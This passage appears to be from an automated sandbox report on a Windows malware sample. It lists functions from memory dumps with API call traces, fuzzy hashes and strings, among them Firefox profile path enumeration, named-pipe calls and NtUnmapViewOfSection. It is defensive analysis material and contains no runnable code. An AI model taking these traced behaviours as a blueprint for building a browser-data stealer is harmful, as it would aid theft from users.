  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6996, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110 Total matches: 35
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C26C0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106 Total matches: 4memorystring
Similarity
  • Total matches: 4
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID: W
  • API String ID: 168078221-655174618
  • Opcode ID: b9da9fa840bf6074c408ec4bac05ea25fd3e186289c4e2afa14c93c02e877af3
  • Instruction ID: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
  • Opcode Fuzzy Hash: 70F049740108C689C00738799034776A140BFB12E5C8D7B31EA1A7968E7F62759A6B19
  • Instruction Fuzzy Hash: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
APIs
  • lstrlen.KERNEL32(00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000,00000000,00000001,?,?,001CD506,00000000), ref: 001C2752
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001C2765
  • lstrcpy.KERNEL32(00000004,00000000), ref: 001C2783
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,001EC202), ref: 001C27A9
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
